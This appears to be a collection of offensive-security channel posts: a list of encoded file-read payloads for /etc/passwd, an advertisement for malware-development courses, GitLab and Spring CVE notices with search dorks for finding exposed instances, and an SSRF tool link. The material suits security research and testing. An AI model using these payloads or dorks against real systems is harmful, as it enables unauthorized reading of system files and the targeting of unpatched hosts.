Brut Security Website is now live- Visit- https://brutsec.com/

Did you know that you can smuggle payloads in your email & phone number if incorrect validation is done!

Payloads for LFR/LFD ⚔️

file:/etc/passwd%3F/ 
file:/etc%252Fpasswd/ 
file:/etc%252Fpasswd%3F/ 
file:///etc/%3F/../passwd 
file:${br}/et${u}c%252Fpas${te}swd%3F/ 
file:$(br)/et$(u)c%252Fpas$(te)swd%3F/

BLACKFRIDAY2024 SALE: Get all of our malware development and red teaming courses bundle for only $199.

❌$400
✅$199

Start your new year with developing malware and building offensive tools

redteamsorcery.teachable.com/p/learnthemall

CVE-2024-11274, -8233, other: Multiple vulnerabilities in GitLab, 7.5 - 8.7 rating❗

In a new release, GitLab talked about two important vulnerabilities. One of them allows attacker to carry out DoS, the second allows to steal session data and potentially gain unauthorized access to accounts. Several smaller vulnerabilities are also mentioned.

Search at Netlas.io:
👉 Link: https://nt.ls/xM1vs
👉 Dork: http.favicon.hash_sha256:72a2cad5025aa931d6ea56c3201d1f18e68a8cd39788c7c80d5b2b82aa5143ef OR http.headers.set_cookie:"gitlab" OR http.headers.location:"gitlab"

Vendor's advisory: https://about.gitlab.com/releases/2024/12/11/patch-release-gitlab-17-6-2-released/

CVE-2024-38819: Path Traversal in Spring Framework, 7.5 rating❗️

Another Path Traversal vulnerability in the Spring framework. This time there is even a PoC!

Search at Netlas.io:
👉 Link: https://nt.ls/AzCtg
👉 Dork: tag.name:"spring"

Vendor's advisory: https://spring.io/security/cve-2024-38819

⚡️SSRFUtility - SSRF Exploitation Tool
🔗 https://ssrf.cvssadvisor.com/